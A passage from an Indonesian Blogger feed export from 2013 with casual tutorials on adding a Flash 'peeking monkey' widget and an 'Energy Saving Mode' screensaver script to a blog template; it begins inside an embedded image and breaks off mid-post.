&lt;img src=&quot;data:image/jpeg;base64,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&quot; /&gt; &lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;Captain kid&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/5089314453090766533/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/10-hal-yang-dapat-dilakukan-di-internet.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/5089314453090766533'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/5089314453090766533'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/10-hal-yang-dapat-dilakukan-di-internet.html' title='10 Hal Yang Dapat Dilakukan Di Internet'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6GIS1HoY9UiogdswHLq_j2G98W0PsShVUuxhCKz5dftMGn_xNCWfCGA-2Z7U3dZttoQWOzDUf7xyJ_SxpJjsvW54OsLH5Czvf32-tP3pNTCn9bdkE0rRz76BqsUtpcKhk0LvyhC7GMAiV/s72-c/kaskus1.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-4493069877405018034</id><published>2013-02-23T04:44:00.001-08:00</published><updated>2013-02-23T04:50:15.347-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="widgets"/><title type='text'>Cara Membuat Monyet Di Blog</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNwxSIMV8vFeXAs4Mzo1qY7MLN9pHYUJMSQISdXvOp0SW6Km8CmkuuQ-K0zM4Nvsq3QLdfqKEhsm8ciEdGyPOsvfjCG9-PfbkSQ4Wxqwg4RiHSm6OuzHreg5RB8w-5b5qlaYJu6VFpcaFe/s1600/nyemot.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;republicofnote.blogspot.com&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNwxSIMV8vFeXAs4Mzo1qY7MLN9pHYUJMSQISdXvOp0SW6Km8CmkuuQ-K0zM4Nvsq3QLdfqKEhsm8ciEdGyPOsvfjCG9-PfbkSQ4Wxqwg4RiHSm6OuzHreg5RB8w-5b5qlaYJu6VFpcaFe/s1600/nyemot.jpg&quot; title=&quot;Trik Membuat Widget Monyet Ngumpet di Blog&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2013/02/cara-membuat-monyet-di-blog.html&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;Trik Membuat Widget Monyet Ngumpet di Blog&lt;/span&gt;&lt;/a&gt;
 - Pernah jaan-jalan di blog orang, eh g sengaja nemu widget yang 
sesuatu banget, tuh kamu lihat ajah sendiri diatas gambarnya? sudah tau 
apa belum?&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
yah itu adalah &quot;widget monyet ngintip&quot; lucu, unyu-unyu banget dah...&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
ekekek&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Nah bagi kamu yang mau pasang widget ini di blognya bisa pasang kodenya sebagai berikut :&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;1. Login ke akun &lt;span style=&quot;color: orange;&quot;&gt;blogger &lt;/span&gt;anda&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;2. Klik &lt;span style=&quot;color: orange;&quot;&gt;Template &lt;/span&gt;»&amp;nbsp;&lt;span style=&quot;color: orange;&quot;&gt;Edit HTML&lt;/span&gt; »&amp;nbsp;&lt;span style=&quot;color: orange;&quot;&gt;Lanjutkan &lt;/span&gt;»&amp;nbsp;Centang&amp;nbsp;&lt;span style=&quot;line-height: 115%;&quot;&gt;&lt;input type=&quot;checkbox&quot; /&gt;Expand Template Widget&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;span style=&quot;line-height: 115%;&quot;&gt;3. Cari kode&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;, lalu letakan kode dibawah ini tepat diatas kode tadi&lt;/span&gt;&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;div class=&quot;MsoPlainText&quot; style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Courier New&amp;quot;;&quot;&gt;&amp;lt;div 
id=&#39;namanyayoyo&#39; 
style=&#39;position:fixed;bottom:50px;left:0;z-index:1&#39;&amp;gt;&amp;lt;embed 
bgcolor=&#39;#FFFFFF&#39; height=&#39;125&#39; id=&#39;mymovie&#39; name=&#39;mymovie&#39; 
quality=&#39;high&#39; 
src=&#39;http://www.cute-factor.com/animation/yoyocici/yoyoduo.swf&#39; style=&#39;&#39;
 type=&#39;application/x-shockwave-flash&#39; width=&#39;50&#39; 
wmode=&#39;transparent&#39;/&amp;gt;&amp;lt;/div&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;/blockquote&gt;
contohnya langsung aja liat di blog ane ,, &lt;br /&gt;
coba kamu sorot kursornya ke arah nyemotnya, dia pasti terkejut dan langsung ngumpet...&lt;br /&gt;
hehehe.&lt;br /&gt;
Sekian dulu postingan ane kali ini. Bye bye&lt;br /&gt;&lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;Captain Kid&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div id=&quot;namanyayoyo&quot; style=&quot;bottom: 50px; left: 0; position: fixed; z-index: 1;&quot;&gt;
&lt;embed bgcolor=&quot;#FFFFFF&quot; height=&quot;125&quot; id=&quot;mymovie&quot; name=&quot;mymovie&quot; quality=&quot;high&quot; src=&quot;http://www.cute-factor.com/animation/yoyocici/yoyoduo.swf&quot; type=&quot;application/x-shockwave-flash&quot; width=&quot;50&quot; wmode=&quot;transparent&quot;&gt;&lt;/embed&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/4493069877405018034/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/cara-membuat-monyet-di-blog.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/4493069877405018034'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/4493069877405018034'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/cara-membuat-monyet-di-blog.html' title='Cara Membuat Monyet Di Blog'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNwxSIMV8vFeXAs4Mzo1qY7MLN9pHYUJMSQISdXvOp0SW6Km8CmkuuQ-K0zM4Nvsq3QLdfqKEhsm8ciEdGyPOsvfjCG9-PfbkSQ4Wxqwg4RiHSm6OuzHreg5RB8w-5b5qlaYJu6VFpcaFe/s72-c/nyemot.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-8320746862752870590</id><published>2013-02-20T21:37:00.000-08:00</published><updated>2013-02-20T22:04:17.837-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="tips-trick"/><title type='text'>Energy Saving Mode Untuk Blogger</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Pastinya sahabat blogger sebelumnya sudah ada yang memasang Energy 
Saving Mode pada Halaman Blog nya !. kira-kira tau gak sih.....apa itu 
Energy saving mode ?. nah...bagi yang pada belum tau apa tu Energy 
Saving Mode Langsung kita tanya saja sama ahlinya.
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPQFdKfuWBIR895TyNHwXP896kNNLw0a2_TD4Rsmi9zyud6ot7MQQNhBi7h49JLSVpck728EK4wkcFfZLh7EcLahf6a20GPRKDss9rzlTKMdl4e7YYCcybKVYmyEfcPS-tH6aLSf8wUxYb/s1600/energi+saving+mode.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;182&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPQFdKfuWBIR895TyNHwXP896kNNLw0a2_TD4Rsmi9zyud6ot7MQQNhBi7h49JLSVpck728EK4wkcFfZLh7EcLahf6a20GPRKDss9rzlTKMdl4e7YYCcybKVYmyEfcPS-tH6aLSf8wUxYb/s320/energi+saving+mode.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Hasil dari tanya-tanya sama ahlinya nih&amp;nbsp; sama Prof. Dr. ir. Google. Msi, Mpd. M.eng dan lain didapat jawabannya.&amp;nbsp; &lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Energy saving mode jika dijelaskan secara rinci pengertiannya yaitu 
kondisi standby dimana seluruh process dihentikan sementara. 
Proses-proses yang berjalan misalnya adalah gambar grafik bergerak 
(misalnya: .gif), flash video, auto scrolling widget, dan masih banyak 
lagi. Dengan adanya plugin screensaver tersebut, proses-proses dalam 
suatu halaman web dihentikan (paused) dan muncul sebuah tampilan baru 
sederhana di atas halaman. &lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Jadi, energy dan proses yang digunakan oleh komputer dapat 
diminimalisir. Itulah mengapa, seringkali aplikasi ini dikaitkan dengan 
gerakan hemat energy dan save green environment. Aplikasi screen saver 
akan dihentikan kinerjanya oleh browser (dikembalikan ke tampilan 
semula) ketika pengunjung/visitor menggerakkan mouse (mouse over)&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Nah....itu dia sobat pengertian &lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2013/02/energy-saving-mode-untuk-blogger.html&quot; target=&quot;_blank&quot;&gt;Energy Saving Mode&lt;/a&gt; dan Manfaatnya Energy Saving mode pada halaman blog. Ok sekarang kita bahas bagaimana caranya untuk memasang pada halaman blog.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Berikut langkah-langkah memasang Energy Saving Mode Pada halaman Blog&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;Pastikan sobat sudah login kehalaman blog &lt;/li&gt;
&lt;li&gt;Pilih menu &lt;b&gt;template&lt;/b&gt;.&lt;/li&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;li&gt;Klik pada tombol &lt;b&gt;Edit HTML&lt;/b&gt;&lt;/li&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;li&gt;Klik Tombol&lt;b&gt; Lanjutkan&lt;/b&gt; atau &lt;b&gt;proses&lt;/b&gt;&lt;/li&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;li&gt;Tunggu beberapa saat akan tampil halaman seperti berikut&lt;/li&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;li&gt;Cari kode&lt;b&gt; &amp;lt;/head&amp;gt;&lt;/b&gt; (Gunakan tombol CTRL + F dan F3 agar lebih mudah mencari kode)&lt;/li&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;li&gt;Copy dan letakan kode berikut atas kode &lt;b&gt;&amp;lt;/head&amp;gt;&amp;nbsp;&lt;/b&gt;&lt;/li&gt;
&lt;blockquote&gt;
&amp;lt;script language=&#39;javascript&#39; src=&#39;http://secondangerz.googlecode.com/files/EnergySavingMode.js.htm&#39; type=&#39;text/javascript&#39;/&amp;gt;&lt;/blockquote&gt;
&lt;li&gt;Klik Save Template dan selesai &lt;/li&gt;
&lt;/ol&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Itulah sekilas &lt;b&gt;Tutorial Blogger&lt;/b&gt; mengenai &lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2013/02/energy-saving-mode-untuk-blogger.html&quot; target=&quot;_blank&quot;&gt;Cara memasang energy saving mode pada blog&lt;/a&gt;.
 Semoga bermanfaat kekurangan saya mohon maaf, yang baik silakan diambil 
yang buruk mohon diperbaiki, karena sempurna hanya milik allah SWT yang 
maha kuasa dan juga lagu milik andra and the backbone. Trimakasih....!&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/8320746862752870590/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/energy-saving-mode-untuk-blogger.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/8320746862752870590'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/8320746862752870590'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/energy-saving-mode-untuk-blogger.html' title='Energy Saving Mode Untuk Blogger'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPQFdKfuWBIR895TyNHwXP896kNNLw0a2_TD4Rsmi9zyud6ot7MQQNhBi7h49JLSVpck728EK4wkcFfZLh7EcLahf6a20GPRKDss9rzlTKMdl4e7YYCcybKVYmyEfcPS-tH6aLSf8wUxYb/s72-c/energi+saving+mode.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-7114917473946129908</id><published>2013-02-16T06:22:00.004-08:00</published><updated>2013-02-16T06:23:51.592-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="widgets"/><title type='text'>Cara Memasang Widget Sharing Is Sexy </title><content type='html'>&lt;span style=&quot;font-style: italic;&quot;&gt;Sharing is sexy&lt;/span&gt; adalah salah satu widget &lt;a 